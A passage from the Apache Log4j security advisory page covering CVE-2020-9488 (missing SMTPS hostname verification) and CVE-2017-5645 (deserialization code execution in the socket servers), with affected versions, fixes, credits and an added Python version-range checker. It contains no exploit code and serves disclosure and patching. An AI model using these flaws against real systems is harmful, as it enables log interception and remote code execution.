<h3 id="CVE-2020-9488"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-9488">CVE-2020-9488</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">Improper validation of certificate with host mismatch in SMTP appender</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 3.x Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">3.7 LOW (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-beta1, 2.12.3) ∪ [2.13.1, 2.13.2)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.12.3</code> (Java 7) and <code>2.13.2</code> (Java 8 and later)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2020-9488-description">Description</h4>
<div class="paragraph">
<p>Improper validation of a certificate whose host name does not match in the SMTP appender.
This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack, which could leak any log
messages sent through that appender.</p>
</div>
<div class="paragraph">
<p>The reported issue was caused by an error in <code>SslConfiguration</code>.
Any element using <code>SslConfiguration</code> in the Log4j <code>Configuration</code> is also affected by this issue.
This includes <code>HttpAppender</code>, <code>SocketAppender</code>, and <code>SyslogAppender</code>.
Usages of <code>SslConfiguration</code> that are configured via system properties are not affected.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2020-9488-mitigation">Mitigation</h4>
<div class="paragraph">
<p>Upgrade to <code>2.12.3</code> (Java 7) or <code>2.13.2</code> (Java 8 and later).</p>
</div>
<div class="paragraph">
<p>Alternatively, users can set the <code>mail.smtp.ssl.checkserveridentity</code> system property to <code>true</code> to enable SMTPS hostname verification for all SMTPS mail sessions.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2020-9488-credits">Credits</h4>
<div class="paragraph">
<p>This issue was discovered by Peter Stöckli.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2020-9488-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-9488">CVE-2020-9488</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-2819">LOG4J2-2819</a></p>
</li>
</ul>
</div>
</div>
</div>
<div class="sect2">
<h3 id="CVE-2017-5645"><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5645">CVE-2017-5645</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">TCP/UDP socket servers can be exploited to execute arbitrary code</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 2.0 Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-alpha1, 2.8.2)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.8.2</code> (Java 7)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2017-5645-description">Description</h4>
<div class="paragraph">
<p>When using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2017-5645-mitigation">Mitigation</h4>
<div class="paragraph">
<p>Java 7 and above users should migrate to version <code>2.8.2</code> or avoid using the socket server classes.
Java 6 users should avoid using the TCP or UDP socket server classes, or they can manually backport <a href="https://github.com/apache/logging-log4j2/commit/5dcc192">the security fix commit</a> from <code>2.8.2</code>.</p>
</div>
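<div class="paragraph">
<p>To decide whether an upgrade is needed, the "Versions affected" ranges given above for CVE-2020-9488 and CVE-2017-5645 can be checked mechanically. The following Python script, an added example rather than Log4j code, parses that interval notation and tests a deployed <code>log4j-core</code> version against it; its pre-release ordering (alpha &lt; beta &lt; rc &lt; release) is a simplification of Maven's and an assumption of the example.</p>
</div>

```python
"""Check a deployed log4j-core version against the 'Versions affected' ranges on this page.
Added example, not Log4j code; the qualifier ordering is a simplification of Maven's."""
import re

# Interval notation exactly as printed in the advisory tables above.
RANGES = {
    "CVE-2020-9488": "[2.0-beta1, 2.12.3) ∪ [2.13.1, 2.13.2)",
    "CVE-2017-5645": "[2.0-alpha1, 2.8.2)",
}
_QUALIFIER_RANK = {"alpha": 0, "beta": 1, "rc": 2}   # assumed ordering
_INTERVAL = re.compile(r"([\[(])\s*([^,\s]+)\s*,\s*([^\s\])]+)\s*([\])])")

def version_key(v):
    """Sortable key: 2.0-alpha1 < 2.0-beta1 < 2.0-rc1 < 2.0 < 2.0.1."""
    base, _, qual = v.partition("-")
    nums = tuple(int(p) for p in base.split("."))
    nums += (0,) * (3 - len(nums))          # 2.0 compares equal to 2.0.0
    if not qual:
        return nums + (1, 0, 0)             # a release outranks its pre-releases
    m = re.fullmatch(r"([a-z]+)(\d*)", qual.lower())
    if not m or m.group(1) not in _QUALIFIER_RANK:
        raise ValueError(f"unsupported qualifier in {v!r}")
    return nums + (0, _QUALIFIER_RANK[m.group(1)], int(m.group(2) or 0))

def parse_ranges(spec):
    """Split '[lo, hi) ∪ [lo, hi]' into (lo_inclusive, lo, hi, hi_inclusive) tuples."""
    out = []
    for part in spec.split("∪"):
        m = _INTERVAL.fullmatch(part.strip())
        if not m:
            raise ValueError(f"bad interval: {part!r}")
        out.append((m.group(1) == "[", m.group(2), m.group(3), m.group(4) == "]"))
    return out

def is_affected(version, spec):
    """True when version lies in any interval of spec."""
    k = version_key(version)
    for lo_inc, lo, hi, hi_inc in parse_ranges(spec):
        lo_k, hi_k = version_key(lo), version_key(hi)
        if (k >= lo_k if lo_inc else k > lo_k) and (k <= hi_k if hi_inc else k < hi_k):
            return True
    return False

def affected_advisories(version):
    """Advisories on this page whose affected range contains the given version."""
    return sorted(cve for cve, spec in RANGES.items() if is_affected(version, spec))

if __name__ == "__main__":
    for v in ("2.0-alpha1", "2.8.1", "2.13.0", "2.13.1", "2.23.1"):
        print(v, affected_advisories(v) or "not affected by the advisories above")
```

The version string to feed in is the one in the deployed <code>log4j-core-&lt;version&gt;.jar</code> file name; note that <code>2.13.0</code> correctly falls outside both intervals of CVE-2020-9488.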
</div>
<div class="sect3">
<h4 id="CVE-2017-5645-credits">Credits</h4>
<div class="paragraph">
<p>This issue was discovered by Marcio Almeida de Macedo of Red Team at Telstra.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2017-5645-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5645">CVE-2017-5645</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-1863">LOG4J2-1863</a></p>
</li>
<li>
<p><a href="https://github.com/apache/logging-log4j2/commit/5dcc192">Security fix commit</a></p>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</main>
</div>
</div>
<hr/>
<footer>
<div class="container-fluid">
<div class="row-fluid">
<p align="center">Copyright &copy; 1999-2024 <a class="external" href="https://www.apache.org">The Apache Software Foundation</a>. All Rights Reserved.<br />
Apache Logging, Apache Log4j, Log4j, Apache, the Apache feather logo, and the Apache Logging project logo are trademarks of The Apache Software Foundation.</p>
</div>
</div>
</footer>
</body>
</html>